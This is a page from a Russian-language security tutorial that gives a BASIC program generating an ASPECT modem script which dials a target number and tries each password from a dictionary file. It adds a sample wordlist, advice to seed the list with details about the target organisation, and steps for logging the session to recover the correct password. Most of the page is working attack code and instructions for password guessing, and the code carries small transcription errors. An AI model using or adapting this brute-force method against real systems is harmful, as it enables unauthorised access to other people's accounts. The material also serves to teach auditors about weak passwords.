Иллюстрированный самоучитель по Secure Web

         

Файл словаря может содержать любое



OPEN "5551235.was" FOR OUTPUT AS #2

OPEN "LIST.txt" FOR INPUT AS tl

PRINT #2, "proc main"

PRINT #2, "dial
DATA " + CHR$(34) + "5551235" + CHR$(34)

DO UNTIL EOF(l)

LINE INPUT #1, in$

inS = LTRIM$(in$) + "ЛМ"

PRINT #2, "waitfor " + CHR$(34) + "
Enter Password:" + CHR$(34)

PRINT #2, "transmit " + CHR$(34) + inS + CHR$(34)

LOOP

PRINT #2, "endproc"

Файл словаря может содержать любое количество типичных паролей, например:

apple

applel

apple2

applepie

applepies

applepiesl

applepies2

applicate

applicates

application

applicationl

applonia

applonial

и т.д.

Размер словаря может быть любым, здесь можно проявлять любое творчество. Если известна какая-либо конкретная информация о целевой организации, например имена сотрудников или название местной спортивной команды, то в словарь следует добавить и ее. Главное, создать как можно более эффективный словарь.

Затем нужно взять готовый файл 5551235.WAS, скомпилировать его с использованием компилятором языка ASPECT и запустить на выполнение.

Поскольку сценарий предназначен для подбора паролей, перед началом его выполнения нужно открыть файл журнала регистрации событий. Тогда весь процесс работы сценария будет фиксироваться в файле. Позднее содержимое файла журнала можно проанализировать и определить правильный пароль. На первый взгляд, может показаться, что журнал регистрации вовсе не нужен. Достаточно просто выполнять сценарий до успешной попытки (получения корректного пароля). Однако это невозможно, поскольку заранее нельзя определить, что произойдет после ввода корректного пароля, т.е. нельзя сформулировать условие успешной попытки. Если же известно, к какому результату должен привести ввод корректного пароля, то в файле сценария на языке ASPECT можно использовать условие WAITFOR и задать соответствующее условие. При таком подходе остается меньше шансов для случайностей. Авторы являются сторонниками журналов регистрации. Хотя такие журналы сложно анализировать — их легко создавать. При этом, конечно, предполагается, что дополнительные сведения о соединении отсутствуют. Те, кто работал консультантом по безопасности или аудитором и сотрудничал с людьми, знающими характеристики удаленных соединений своих организаций, могут использовать совсем другие подходы.


Содержание  Назад  Вперед